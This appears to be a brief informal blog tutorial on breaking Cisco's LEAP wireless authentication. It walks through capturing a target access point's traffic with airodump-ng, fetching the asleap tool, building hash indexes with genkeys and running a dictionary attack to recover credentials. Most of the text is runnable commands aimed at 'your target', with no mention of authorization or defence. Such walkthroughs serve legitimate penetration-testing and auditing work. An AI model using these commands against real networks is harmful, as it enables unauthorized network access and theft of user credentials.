What is this about?

Lightweight Extensible Authentication Protocol, which is Cisco’s DIY version of MS-CHAP.

Step 0

Read this and that

Lets oneshot this

Dumping traffic

Last time I checked LEAP was used as much as WEP, so yeah this is going to be a short one!

Get your target’s info with a simple

airodump-ng mon0

Get the channel and BSSID and set it in the following command to whatever your target is

airodump-ng -c 2 --bssid 00:11:22:33:44:55 -w /tmp/potato.cap mon0

You can run this directly on asleap with the -i option though, this is just an extra step to have logs and target a single AP…

Breaking LEAP

Get Asleap by running a

git clone https://github.com/joswr1ght/asleap

Generate your hashes + indexes with genkeys if you need to.

./genkeys -r your-dictionary -f /path/to/hashes -n /path/to/indexes

Now run the following line every so often

./asleap -r /tmp/potato.cap -f /path/to/hashes -n /path/to/indexes -v

Go watch some TV and come back for the next run…